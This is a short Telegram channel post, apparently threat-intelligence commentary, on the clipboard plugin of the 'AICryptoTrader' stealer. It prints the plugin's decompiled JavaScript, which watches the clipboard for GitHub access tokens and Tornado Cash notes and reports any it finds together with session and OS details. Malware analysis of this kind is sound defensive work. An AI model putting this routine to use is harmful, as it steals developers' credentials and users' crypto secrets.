TGViewer
Adventures in Dystopia Adventures in Dystopia @monolog · 1.78K subscribers
Post #1128 225
🔍 An interesting detail in AICryptoTrader, a stealer reportedly linked to North Korean actors: its clipboard plugin hunts for GitHub tokens and Tornado Cash notes.

It matches GitHub token patterns and checks for the tornado- prefix, then reports matches alongside session and OS information.


const t = readClipboard().trim();
if (!t || e == t) continue;
e = t;
const l = /\b(ghp_[A-Za-z0-9]{36}|github_pat_[A-Za-z0-9_]{22,}|gh[ousr]_[A-Za-z0-9]{36})\b/g;
const r = [...t.matchAll(l)].map(e => e[0]);
if (r.length > 0) {
let e = JSON.stringify(t);
if (e.length > 1e3) e = e.substring(0, 1e3) + " ...";
const s = `${n.SESSION_ID} / ${n.OS_INFO} / ${CB_VERSION}\nGitHub = ${JSON.stringify([...new Set(r)])}\n\n${e}`;
if (i == s) continue;
i = s;
const c = "KC";
o(s, undefined, c);
} else if (t.startsWith("tornado-")) {
let e = JSON.stringify(t);
if (e.length > 200) e = e.substring(0, 200) + " ...";
const s = `${n.SESSION_ID} / ${n.OS_INFO} / ${CB_VERSION}\n${e}`;
if (i == s) continue;
i = s;
const c = "00";
o(s, undefined, c);
}


More brief analysis: https://www.linkedin.com/pulse/malware-analysis-report-aicryptotrader-coin-rich-elsayeh-ph-d--seuge/
  • 😢 1
More from @monolog
  1. Sep 23, 2026https://medium.com/@censync_dev/nobody-reads-42-characters-6b84726faff0 Коллеги, я тут ста…
  2. Sep 22, 2026От сумы, тюрьмы и скама в тг не зарекайся
  3. Sep 22, 2026photo post
  4. Sep 20, 2026But in instagram
  5. Sep 20, 2026https://saweis.net/posts/rsa-896.html but no details yet
  6. Sep 19, 2026😒 Россияне стали отказываться от отчества Никитич. Всё чаще они требуют записывать своих…
Threads Profile ViewerView any public Threads profile without an account.Open ThreadLook →Writing with AI? Make it sound human.Metric37 rewrites AI drafts so they read naturally. Free AI detector, 1,500 words free.Try Metric37 →